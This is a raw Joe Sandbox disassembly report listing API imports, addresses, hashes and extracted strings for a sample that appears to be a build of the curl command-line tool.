                                    • _configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 00E51190
                                    • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E5119F
                                    Similarity
                                    • API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_narrow_argv_initialize_narrow_environment_set_app_type_set_fmode
                                    • String ID:
                                    • API String ID: 1933938900-0
                                    APIs
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00E52241,00E520AB,00E51714), ref: 00E52258
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E52266
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E5227F
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00E52241,00E520AB,00E51714), ref: 00E522D1
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E42223
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4223B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E42253
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4226B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E42283
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4229B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E422B3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E422CB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E422E3
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,766B3C50,00000000,00E2182F), ref: 00E1F671
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F685
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F699
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6AD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6C1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6D5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6E9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6FD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F70F
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 35bbe54a9b455fdcd9630f258c08f996e2c5324324a6bace36a11b29df183fea
                                    • Instruction ID: 3b664ccc126db7f591f270125d7326953b25a951d9e075034a34d6ba017e265c
                                    • Opcode Fuzzy Hash: 35bbe54a9b455fdcd9630f258c08f996e2c5324324a6bace36a11b29df183fea
                                    • Instruction Fuzzy Hash: B911B432614925DF8A092F26FC1845DBBA5EF486A2311842AE405A3671CFE82C198FD0
                                    APIs
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,I32,00000003,?,00000000,766A43D0,?,00E11589,?,?,?,?,00000000), ref: 00E11012
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: strncmp
                                    • String ID: I32$I64
                                    • API String ID: 1114863663-3980630743
                                    • Opcode ID: eb4e6430bb3eeb696bea1d09e797be4e4c06fd9f88115d30c506ce3f69f95b2c
                                    • Instruction ID: 563b7876c3062441b085850702712c7954e468adcf1d0591bdf320c14f718f9a
                                    • Opcode Fuzzy Hash: eb4e6430bb3eeb696bea1d09e797be4e4c06fd9f88115d30c506ce3f69f95b2c
                                    • Instruction Fuzzy Hash: 18F1B4B1E042059FDB1D8E6CC9A83FCBBA1EB45308F2861AED752F7665D2758AC0C740
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22EDF
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22F0B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E22F22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: calloc$free
                                    • String ID: pS$xk
                                    • API String ID: 171065143-2717256946
                                    • Opcode ID: 4ba920ea780fdca899eb9110c4fefb6ebd57cd599ab2f0765d7379f74344e1f0
                                    • Instruction ID: 9fcef4dec808b48ca0fa32937ffe7e72b8e33aac00f2a0e50d4859d8ab179acb
                                    • Opcode Fuzzy Hash: 4ba920ea780fdca899eb9110c4fefb6ebd57cd599ab2f0765d7379f74344e1f0
                                    • Instruction Fuzzy Hash: 96B19B75609691CFCB02CF28A8887D67BA1AF15314F1C90BADC08AF357D7769906CFA0
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB20
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB42
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB9C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4D01D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4D033
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$callocmallocrealloc
                                    • String ID:
                                    • API String ID: 4199894680-3916222277
                                    • Opcode ID: 5b1a95fd2021876e94c4075af0bb27e0540ba09f2143efc25c64eabeacd4f695
                                    • Instruction ID: 7248487987d8ea9930e47c6c81248f132cae4e2844a8ad80a66354a07c0d7b7e
                                    • Opcode Fuzzy Hash: 5b1a95fd2021876e94c4075af0bb27e0540ba09f2143efc25c64eabeacd4f695
                                    • Instruction Fuzzy Hash: 54518A31A08A129FCB28CF29E944665BBF1FF88328F248519D419A7B51D772FC94CB91
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,00000000,00000001,00000000,?,?,00E0199D,00000000,?,?,00E01773), ref: 00E02C7A
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000001,?,00E0199D,00000000,?,?,00E01773), ref: 00E02C91
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\\?\,00000004), ref: 00E02CAE
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000004), ref: 00E02D52
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02D79
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$mallocstrncmpstrncpy
                                    • String ID: \\?\$|<>"?*
                                    • API String ID: 2141947759-3264285191
                                    • Opcode ID: 89ea5cbd3422b56c3e13a7d018552cf77dc6a32dec3db12bad9ebe3178482479
                                    • Instruction ID: 1081df5cee26f23f9c3bf359b269274d2a9e6d0727315d0dd7fbd5ca5a81e964
                                    • Opcode Fuzzy Hash: 89ea5cbd3422b56c3e13a7d018552cf77dc6a32dec3db12bad9ebe3178482479
                                    • Instruction Fuzzy Hash: 47514831A047469FEB258B24C89C7AEBBE5AB41308F28646DDF45BB2D6D7308DC4C790
                                    APIs
                                    • strspn.API-MS-WIN-CRT-STRING-L1-1-0(00000005,0123456789abcdefABCDEF:.,00000000,00000000,?), ref: 00E15295
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00E628BC,00000002), ref: 00E152C7
                                    • inet_pton.WS2_32(00000017,00000005,?), ref: 00E1535F
                                    • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(00000004, /:#?!@,00000000,00000000,?), ref: 00E153D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: inet_ptonstrcspnstrncmpstrspn
                                    • String ID: /:#?!@$0123456789abcdefABCDEF:.
                                    • API String ID: 3548342379-4134865206
                                    • Opcode ID: 2b8b5401248dde653b0361ae282befbeaf57d66806259fbaa8b016a2f3bf64a6
                                    • Instruction ID: db4d94c78e50a2e7a294cbadc6342029beab67408fc3f4ff5b81190c8c0608bf
                                    • Opcode Fuzzy Hash: 2b8b5401248dde653b0361ae282befbeaf57d66806259fbaa8b016a2f3bf64a6
                                    • Instruction Fuzzy Hash: 73513733904B45CFDF24CB68DC407ED7BE49F82395F24286AD491F718AD7E0A9898B50
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E36136
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: SMTPUTF8$%s %s%s$EXPN$HELP$T)$VRFY %s%s%s%s
                                    • API String ID: 1294909896-2790894696
                                    • Opcode ID: 7480437320f171c05f65853ec1be8acf383bf22ee19006dd4152a8b14ed9e9aa
                                    • Instruction ID: 266d7ae15e972d53d3d8f7282d961b920f7f900e7d4d2adc10bbe1ace4f05872
                                    • Opcode Fuzzy Hash: 7480437320f171c05f65853ec1be8acf383bf22ee19006dd4152a8b14ed9e9aa
                                    • Instruction Fuzzy Hash: 0A413B70A055156FDB288A688855ABB7FB9DF85318F28E0A9EC84F7212D660DD00CB90
                                    APIs
                                    • _strrchr.LIBCMT ref: 00E3DB47
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3DBC4
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3DBE8
                                      • Part of subcall function 00E4C864: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00E3DB17), ref: 00E4C885
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3DC0E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3DC25
                                    Strings
                                    • Wildcard - Parsing started, xrefs: 00E3DCA0
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$calloc$_strrchr
                                    • String ID: Wildcard - Parsing started
                                    • API String ID: 3895608051-2475583933
                                    • Opcode ID: 119e18e56d23ffd8db61a8ea2baafc89645839f771af3616e1874704656aedb3
                                    • Instruction ID: ccb8ff7026cfe4ffde9f4abee8190efb988d51a83577655a29201cdab694bd17
                                    • Opcode Fuzzy Hash: 119e18e56d23ffd8db61a8ea2baafc89645839f771af3616e1874704656aedb3
                                    • Instruction Fuzzy Hash: 67417B31618A16AFDB189F69FC5879ABFE4EF44365F20106AD409B72A1DBB02C44CB90
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E07A80
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E07A9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strdupfree
                                    • String ID: o$output file name has no length
                                    • API String ID: 1865132094-237255669
                                    • Opcode ID: c207ba1054cdf33d55f588c981432b46d3419097f9eed5fdc7a71fd01d2a43d4
                                    • Instruction ID: 4ecf34c3fa4bf0f07743ec7a552606186ffb68c158ab85ef5dbef40d6c989645
                                    • Opcode Fuzzy Hash: c207ba1054cdf33d55f588c981432b46d3419097f9eed5fdc7a71fd01d2a43d4
                                    • Instruction Fuzzy Hash: 69417271A08B429FC365CF3498417A6B7E1AF45354F245E1DE5EAE72D0DB30E8C29B41
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E24D4E
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 00E24D65
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrstrtol
                                    • String ID: %s%s%s$TQ$XQ
                                    • API String ID: 614545126-1620497692
                                    • Opcode ID: 61397ab722185b56720bbb7d9af7e0a17227049d19eb7561f5ee1ed01983cb8b
                                    • Instruction ID: b508151f360a7d0db1698b88664d72c2b778a1704b512ecdcea63540ed9d7508
                                    • Opcode Fuzzy Hash: 61397ab722185b56720bbb7d9af7e0a17227049d19eb7561f5ee1ed01983cb8b
                                    • Instruction Fuzzy Hash: D43145B6604755EFDF16CF58E8409ADBBA5EF81314F2495A9E841AB381D7705E04CB40
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E0D7AC
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E0D7B7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E0D8B0
                                    Strings
                                    • %s:%s, xrefs: 00E0D897
                                    • Enter %s password for user '%s':, xrefs: 00E0D836
                                    • Enter %s password for user '%s' on URL #%zu:, xrefs: 00E0D85B
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr$free
                                    • String ID: %s:%s$Enter %s password for user '%s' on URL #%zu:$Enter %s password for user '%s':
                                    • API String ID: 3654317688-2337704101
                                    • Opcode ID: c39ba2a406992aee6620bf5faaafcdbf8134aabb1a04205e9160d19bbf30979f
                                    • Instruction ID: 9efde377b50d15fd2979139415855e9896fe04673873b14e0ba30a7b08e229ff
                                    • Opcode Fuzzy Hash: c39ba2a406992aee6620bf5faaafcdbf8134aabb1a04205e9160d19bbf30979f
                                    • Instruction Fuzzy Hash: BF31F571A0521AAFEB25DBA4DC41BDABBF4AF18304F1054E5E548B7182DB70ABD4CF50
                                    APIs
                                    • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,00000000), ref: 00E2B02A
                                    Strings
                                    • ioctl callback returned error %d, xrefs: 00E2B00D
                                    • seek callback returned error %d, xrefs: 00E2AFAE
                                    • necessary data rewind wasn't possible, xrefs: 00E2B038
                                    • the ioctl callback returned %d, xrefs: 00E2AFFA
                                    • Cannot rewind mime/post data, xrefs: 00E2B048
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: fseek
                                    • String ID: Cannot rewind mime/post data$ioctl callback returned error %d$necessary data rewind wasn't possible$seek callback returned error %d$the ioctl callback returned %d
                                    • API String ID: 623662203-539828175
                                    • Opcode ID: 5711de9846499b234f7aefd0a516604038c3e589945408e8ce3c6907525eda9e
                                    • Instruction ID: c353cd288e172d58ea0aacc89ac77f26852c9ca7686dc27db412975f9dcb668c
                                    • Opcode Fuzzy Hash: 5711de9846499b234f7aefd0a516604038c3e589945408e8ce3c6907525eda9e
                                    • Instruction Fuzzy Hash: 39313631700612EFC6295B31ACD9EFBB795FF50359F082265F42977191CB602C54D791
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00E09CB9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00E09CCD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09D63
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09D74
                                    Strings
                                    • Got more output options than URLs, xrefs: 00E09D9F
                                    • out of memory, xrefs: 00E09CDC
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$_strdup
                                    • String ID: Got more output options than URLs$out of memory
                                    • API String ID: 2653869212-1666425204
                                    • Opcode ID: 48099a9eac7edda1cd5c99b1c0037c23762171659a72e99af1c639d551d53a76
                                    • Instruction ID: 159ac1a5734ffe2acd3faa7b39c573a83e3a474db1bced8f382f8e90ca6b0c64
                                    • Opcode Fuzzy Hash: 48099a9eac7edda1cd5c99b1c0037c23762171659a72e99af1c639d551d53a76
                                    • Instruction Fuzzy Hash: B0319E356483469FDB058F64E899B987BF1BB44325F28507AE805AF2D3DB7098C4CB50
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,766B1980,?,00E21D52,?,?,?,?,00E08B8E), ref: 00E21AF5
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00E21D52,?,?,?,?,00E08B8E), ref: 00E21B03
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00E21D52,?,?,?,?,00E08B8E), ref: 00E21B11
                                      • Part of subcall function 00E27EC3: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E28849,00000000,?,?,?,00E12373,?,?,?,?,00E016C6,?,00200030), ref: 00E27F33
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_func$free
                                    • String ID: <$`$v
                                    • API String ID: 1664282339-4007386528
                                    • Opcode ID: f3b5b299b537385079c1b435ebf322c43d3d7ac3ba913dbe3e1730b454aa3e3d
                                    • Instruction ID: 1aa5190ba756c9ba14e4a4cd432c53ba1fea3f0ffa3316d632aa9538163def5a
                                    • Opcode Fuzzy Hash: f3b5b299b537385079c1b435ebf322c43d3d7ac3ba913dbe3e1730b454aa3e3d
                                    • Instruction Fuzzy Hash: 0B51B0B09097408AEB54CF29D8C87C53BA0AF99714F1841BAED4C9F29BD7B91148CF65
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000), ref: 00E2681E
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E57A20,?,?,00000000), ref: 00E26848
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2686D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26887
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E2688F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E268E3
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E268E7
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$fclose$fopenmalloc
                                    • String ID:
                                    • API String ID: 2597608617-0
                                    APIs
                                    • _fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 00E09282
                                      • Part of subcall function 00E0F352: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?), ref: 00E0F58A
                                    • _close.API-MS-WIN-CRT-STDIO-L1-1-0(000000FF), ref: 00E0930A
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E09311
                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E09319
                                      • Part of subcall function 00E10B16: _open.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100,00000180,?,00E02077,?,00008501,00000180), ref: 00E10B2D
                                    Strings
                                    Similarity
                                    • API ID: __acrt_iob_func_close_fileno_fstat64_openfree
                                    • String ID: CURLOPT_INFILESIZE_LARGE$Can't open '%s'!
                                    • API String ID: 440421868-219864042
                                    APIs
                                    • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,?,00E525F8,?,?,00E6F464,00000000,?,00E52723,00000004,InitializeCriticalSectionEx,00E5627C,InitializeCriticalSectionEx,00000000), ref: 00E525C7
                                    Strings
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID: api-ms-
                                    • API String ID: 3664257935-2084034818
                                    APIs
                                    • SearchPathA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-2-0(00000000,curl-ca-bundle.crt,00000000,00000104,?,?), ref: 00E030AB
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E030BD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00E030CA
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E030DD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 00E030E9
                                    Strings
                                    Similarity
                                    • API ID: _strdupfree$PathSearch
                                    • String ID: curl-ca-bundle.crt
                                    • API String ID: 4109318298-694051528
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,00E0900B), ref: 00E08E64
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00E0900B), ref: 00E08E7F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,error initializing curl library,?,00E0900B), ref: 00E08ECE
                                    Strings
                                    • error initializing curl library, xrefs: 00E08EC0
                                    • error retrieving curl library information, xrefs: 00E08EB9
                                    • error initializing curl, xrefs: 00E08ED9
                                    Similarity
                                    • API ID: __acrt_iob_funcfreemalloc
                                    • String ID: error initializing curl$error initializing curl library$error retrieving curl library information
                                    • API String ID: 2771806388-2118345949
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,766B3C50,00000000,00E217E1,00E08BF9), ref: 00E215DF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E215FE
